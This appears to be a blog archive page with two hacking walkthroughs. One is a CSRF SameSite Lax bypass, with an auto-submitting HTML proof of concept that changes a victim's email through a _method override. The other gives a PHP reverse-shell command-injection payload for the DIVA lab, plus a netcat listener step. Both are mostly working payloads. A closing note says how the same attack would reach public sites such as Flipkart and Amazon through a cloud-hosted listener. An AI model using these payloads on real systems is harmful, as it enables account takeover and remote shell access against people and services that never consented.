Posts

Showing posts from April, 2023

CSRF - CRAFTS | Shahul Hameed

SameSite Lax bypass:

1. Change the request method from POST to GET.
2. Add a hidden _method=POST field so the server's method override handles the GET as a POST.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://0a0900a70419828cc0a45e0b00540080.web-security-academy.net/my-account/change-email" method="GET">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="email" value="pwned1&#64;pwned&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Reverse Shell Connection via Command Injection | Shahul Hameed

Command Injection

First retrieve the Kali machine's IP address with the command: ifconfig

Step 1: Open the DIVA application's Command Execution exercise and paste the following payload into the input field:

google.com > junk;php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

Replace 10.0.0.1 with your Kali machine's IP address.

Step 2: Switch to the Kali machine, start an nc (netcat) listener on port 4242, and wait a moment for the reverse connection from the application.

Note: The above application runs on the same private network as the Kali machine. For real-world applications (Flipkart, Amazon) hosted on public IP addresses, the listener would have to run on a machine with a public IP address, such as a cloud-hosted Kali instance.

Payload reference: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md